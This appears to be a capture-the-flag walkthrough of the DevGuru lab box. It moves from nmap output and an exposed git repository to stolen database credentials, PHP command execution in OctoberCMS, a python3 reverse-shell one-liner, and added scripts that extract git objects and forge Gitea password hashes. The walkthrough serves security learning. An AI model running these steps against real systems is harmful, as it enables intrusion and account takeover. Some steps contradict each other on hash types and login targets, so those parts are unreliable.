Nmap scan report for
Host is up (0.16s latency).
Not shown: 65532 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=f886af904a2de78a; Path=/; HttpOnly
| Set-Cookie: _csrf=5bPJDT7tyJUhTZEjhejaOuL5wHU6MTYwNzE2ODk5ODQ5MDExOTg3MQ; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Sat, 05 Dec 2020 11:49:58 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=f1edb5b66713a6a2; Path=/; HttpOnly
| Set-Cookie: _csrf=5rcSOwMuyIXJxXduyRO14YPZQT06MTYwNzE2ODk5ODgzMzcyMzg5Mg; Path=/; Expires=Sun, 06 Dec 2020 11:49:58 GMT; HttpOnly
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_ <meta name="description" content="Gitea (Git with a c
We don't see anything interesting on the web page itself, but the nmap http-git script reports an exposed .git directory, so let's visit it.
Visiting it we find a page that references the master branch (the repository's HEAD).
So there is a git repository exposed on the web server, so let's try to dump its files. We can use a tool for that called GitTools.
Running its dumper took me 22 minutes to fetch the whole .git directory.
The raw objects are not readable as they are, so to get useful data out of them we have to use the Extractor script from GitTools.
First move the dumped .git folder into another folder, then run the tool against it.
As you can see it recovers a bunch of files, which makes our work much easier.
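To show what the Extractor step is actually doing, here is an added example (my own script, not GitTools' code and not anything from the box) that walks a dumped .git directory the way Extractor does: it inflates the loose objects with zlib, follows HEAD to the commit and the commit to its tree, writes every blob under an output directory, and separately dumps every loose blob by sha, reachable or not, since files that were removed in a later commit often survive only as unreferenced objects. It builds a small constructed repository (two files, one commit, a placeholder password) so it runs offline; the file names mirror the ones of interest in this writeup but the contents are made up. It handles loose objects only, not packfiles.

```python
import hashlib
import os
import zlib

def read_object(git_dir, sha):
    """Inflate loose object <git_dir>/objects/xx/yyyy... and return (type, body)."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, _, body = raw.partition(b"\x00")
    kind, size = header.split(b" ")
    if int(size) != len(body):
        raise ValueError("corrupt object " + sha)
    return kind.decode(), body

def parse_tree(body):
    """A tree body is a run of '<mode> <name>\\0<20 raw sha bytes>' entries."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\x00", i)
        mode, name = body[i:nul].split(b" ", 1)
        entries.append((mode.decode(), name.decode(), body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries

def extract_tree(git_dir, tree_sha, out_dir, prefix=""):
    """Write every blob below tree_sha into out_dir; return the relative paths written."""
    written = []
    for mode, name, sha in parse_tree(read_object(git_dir, tree_sha)[1]):
        rel = prefix + name
        if mode == "40000":                      # subdirectory
            os.makedirs(os.path.join(out_dir, rel), exist_ok=True)
            written += extract_tree(git_dir, sha, out_dir, rel + "/")
        elif mode != "160000":                   # 160000 = submodule pointer, nothing to write
            with open(os.path.join(out_dir, rel), "wb") as fh:
                fh.write(read_object(git_dir, sha)[1])
            written.append(rel)
    return written

def extract_head(git_dir, out_dir):
    """Follow HEAD -> branch ref -> commit -> root tree and rebuild the working tree."""
    with open(os.path.join(git_dir, "HEAD")) as fh:
        head = fh.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(git_dir, head[5:])) as fh:
            head = fh.read().strip()
    kind, body = read_object(git_dir, head)
    if kind != "commit":
        raise ValueError("HEAD does not resolve to a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()   # first line is "tree <sha>"
    os.makedirs(out_dir, exist_ok=True)
    return extract_tree(git_dir, tree_sha, out_dir)

def dump_all_blobs(git_dir, out_dir):
    """Write every loose blob, reachable or not, named by its sha (deleted files live here)."""
    os.makedirs(out_dir, exist_ok=True)
    found = []
    objects = os.path.join(git_dir, "objects")
    for sub in os.listdir(objects):
        if len(sub) != 2:                        # skip objects/pack and objects/info
            continue
        for rest in os.listdir(os.path.join(objects, sub)):
            kind, body = read_object(git_dir, sub + rest)
            if kind == "blob":
                with open(os.path.join(out_dir, sub + rest), "wb") as fh:
                    fh.write(body)
                found.append(sub + rest)
    return sorted(found)

# ---- constructed fixture (not the real box's repository) so the script runs offline ----
def write_object(git_dir, kind, body):
    raw = b"%s %d\x00%s" % (kind.encode(), len(body), body)
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.join(git_dir, "objects", sha[:2]), exist_ok=True)
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha

def tree_entry(mode, name, sha):
    return b"%s %s\x00%s" % (mode.encode(), name.encode(), bytes.fromhex(sha))

def build_sample_repo(git_dir):
    """One commit holding .htaccess and config/database.php with made-up contents."""
    db = write_object(git_dir, "blob", b"<?php\nreturn ['password' => 'sample-not-real'];\n")
    config = write_object(git_dir, "tree", tree_entry("100644", "database.php", db))
    ht = write_object(git_dir, "blob", b"Options -Indexes\n")
    root = write_object(git_dir, "tree",
                        tree_entry("100644", ".htaccess", ht) + tree_entry("40000", "config", config))
    commit = write_object(git_dir, "commit",
                          b"tree %s\nauthor a <a@x> 0 +0000\ncommitter a <a@x> 0 +0000\n\nfirst commit\n" % root.encode())
    os.makedirs(os.path.join(git_dir, "refs", "heads"), exist_ok=True)
    with open(os.path.join(git_dir, "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as fh:
        fh.write(commit + "\n")

def demo():
    """Build the fixture in a temp dir, extract it, return (paths, database.php bytes, blob shas)."""
    import tempfile
    tmp = tempfile.mkdtemp()
    git_dir = os.path.join(tmp, ".git")
    build_sample_repo(git_dir)
    paths = extract_head(git_dir, os.path.join(tmp, "src"))
    with open(os.path.join(tmp, "src", "config", "database.php"), "rb") as fh:
        return sorted(paths), fh.read(), dump_all_blobs(git_dir, os.path.join(tmp, "blobs"))
```

Against a real dump, call extract_head("path/to/dumped/.git", "out") for the checked-in tree and dump_all_blobs for the loose objects; then grep the output for "password", "DB_" and similar strings. If the server's objects directory holds a .pack file, this script will not see those objects, and the dumper you used needs to have fetched the packfile as well.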
Reading through the contents of .htaccess we find that there is a login page for the database.
Going back to the extracted .git folder we can find config/database.php, which holds the credentials for the MySQL database.
With those we can log ourselves in, great!
Now, OctoberCMS blocks uploads of .php files; you could try changing the extension to .php3, .php4, .php5 or .phtml, but that won't work either. What we can do instead is run PHP code from the CMS's own pages, and the CMS documents how that is done.
As we can see, the PHP does run, so now we have to craft a PHP reverse shell to get onto the box. Let's first test with a simple $_GET["command"] parameter passed to a system call.
We can run system commands, so the only thing left is to set up a netcat listener and send a reverse-shell command in that parameter. I am going to use a python3 reverse shell because python3 is installed on the box (the listener's IP goes in the empty first element of the connect() tuple):
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And we finally got a shell, sweet!
Now we must enumerate the box. To do that, transfer linpeas to the target with a Python HTTP server.
During the enumeration we find some interesting backup files.
Here we can see that there is another database, for Gitea, which is the service running on port 8585. Looking at the bottom of the file we also find that it can use three password hashing algorithms: bcrypt, scrypt and pbkdf2.
So let's log in to that database like we did with the October DB.
Here I cloned the frank user but added a bcrypt password for him, because with pbkdf2 it was not allowing me to log in.
DB_TYPE = mysql
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
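For the user-cloning step above, here is an added example (my own script, not the writeup's and not Gitea's code) of producing values Gitea will accept in its user table. The KDF parameters are what Gitea's hashPassword() used around this version, as I remember them, and are an assumption to check against the installed build: pbkdf2-hmac-sha256 over the password and the row's salt, 10000 iterations, 50 output bytes stored as hex; scrypt with N=65536, r=16, p=2, 50 bytes as hex; bcrypt stores the "$2a$..." string itself (Python's bcrypt is a third-party package, so that branch is optional). The table `user` and the columns passwd, salt and passwd_hash_algo are also from memory of Gitea's schema. Whichever algorithm you pick, passwd_hash_algo must name it and passwd must be in exactly the format that branch produces, which is the usual reason a hand-made row refuses to log in.

```python
import hashlib
import hmac
import secrets
import string

# KDF parameters as in Gitea's hashPassword() of that era (assumption: check the installed version).
PBKDF2_ITER, PBKDF2_LEN = 10000, 50
SCRYPT_N, SCRYPT_R, SCRYPT_P, SCRYPT_LEN = 65536, 16, 2, 50
SALT_CHARS = string.ascii_letters + string.digits

def new_salt(length=10):
    """Gitea keeps a short random alphanumeric salt per user in user.salt."""
    return "".join(secrets.choice(SALT_CHARS) for _ in range(length))

def hash_password(password, salt, algo="pbkdf2"):
    """Return what goes into user.passwd: hex digest for the KDFs, the '$2a$' string for bcrypt."""
    pw, s = password.encode(), salt.encode()
    if algo == "pbkdf2":
        return hashlib.pbkdf2_hmac("sha256", pw, s, PBKDF2_ITER, dklen=PBKDF2_LEN).hex()
    if algo == "scrypt":
        # 128*r*N bytes (~134 MiB) are needed; hashlib's default maxmem of 32 MiB would reject this
        return hashlib.scrypt(pw, salt=s, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P,
                              maxmem=2 ** 28, dklen=SCRYPT_LEN).hex()
    if algo == "bcrypt":
        import bcrypt  # third-party package; the bcrypt string is stored as-is, salt column unused
        return bcrypt.hashpw(pw, bcrypt.gensalt()).decode()
    raise ValueError("unsupported algo: " + algo)

def verify_password(stored, salt, algo, candidate):
    """Check a candidate the way the login path would for that algo."""
    if algo == "bcrypt":
        import bcrypt
        return bcrypt.checkpw(candidate.encode(), stored.encode())
    return hmac.compare_digest(stored, hash_password(candidate, salt, algo))

def update_statement(username, password, algo="pbkdf2"):
    """Build the UPDATE for the gitea DB (table `user`, columns passwd / salt / passwd_hash_algo).
    Returns (sql, salt, digest) so the values can be re-checked with verify_password()."""
    if not all(c in SALT_CHARS + "-_." for c in username):
        raise ValueError("refusing to interpolate an unexpected username into SQL")
    salt = new_salt()
    digest = hash_password(password, salt, algo)
    sql = ("UPDATE `user` SET passwd='%s', salt='%s', passwd_hash_algo='%s' WHERE name='%s';"
           % (digest, salt, algo, username))
    return sql, salt, digest

if __name__ == "__main__":
    sql, salt, digest = update_statement("frank", "Passw0rd!")
    print(sql)
    print(verify_password(digest, salt, "pbkdf2", "Passw0rd!"))   # True
```

Run it, paste the printed UPDATE into the mysql session you already have on the gitea database (or adapt it to an INSERT for a cloned row), and log in with the new password. If the login still fails, compare the stored value's length and encoding with an existing row before suspecting the algorithm.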
Here we can find the password hash for frank, stored with bcrypt (it starts with $2, the prefix family of bcrypt hashes such as $2a$ and $2y$). Trying to crack the hash would be a waste of time; instead we can simply add a user whose password we hash with bcrypt ourselves.
Then, logging in as that user, we can access the OctoberCMS dashboard.
Going to Settings and then Event log we can see there's an image